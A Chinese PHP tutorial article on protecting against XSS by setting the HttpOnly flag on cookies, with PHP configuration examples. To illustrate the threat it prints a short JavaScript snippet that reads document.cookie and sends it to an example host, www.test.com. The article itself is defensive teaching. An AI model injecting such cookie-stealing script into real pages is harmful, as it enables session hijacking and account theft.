xss防御之php利用httponly防xss攻击
更新时间:2014年03月21日 16:24:02 作者:
这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
复制代码 代码如下:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:
复制代码 代码如下:
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
对于PHP5.1以前版本的PHP通过:
复制代码 代码如下:
header("Set-Cookie: hidden=value; httpOnly");
最后,HttpOnly不是万能的!
相关文章
这篇文章主要介绍了Joomla简单判断用户是否登录的方法,涉及Joomla基于服务器端变量结合Joomla文件进行判断与跳转的相关技巧,需要的朋友可以参考下2016-05-05
本篇文章主要介绍了session 加入redis 的实例,对session 进行了详细介绍,并提供了代码实例,需要的朋友可以参考下2016-07-07
这篇文章主要介绍了PHP实现单例模式最安全的做法,适用PHP5.3以上版本,采用了最好的做法,需要的朋友可以参考下2014-06-06
这篇文章主要介绍了使用php实现中文验证码,代码简单,大家可以直接使用2014-01-01
下面小编就为大家带来一篇基于PHP-FPM进程池探秘。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-10-10
这篇文章主要介绍了phpmyadmin在宝塔面板里进不去的解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2020-07-07
这篇文章主要介绍了thinkphp5 URL和路由的功能详解与实例,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-12-12
discuz论坛的程序可读性不好,晕晕的.为了整合论坛和网站数据,又不得不看.2008-11-11
在项目开发中,我们常常会遇到英文、中文等字符串截取问题,比如说新闻列表页面需要新闻内容简介,这就要用到字符串截取了。2017-03-03
这篇文章主要介绍了CI框架文件上传类及图像处理类用法,设计CI框架图片上传及缩略图操作的相关技巧,需要的朋友可以参考下2016-05-05
最新评论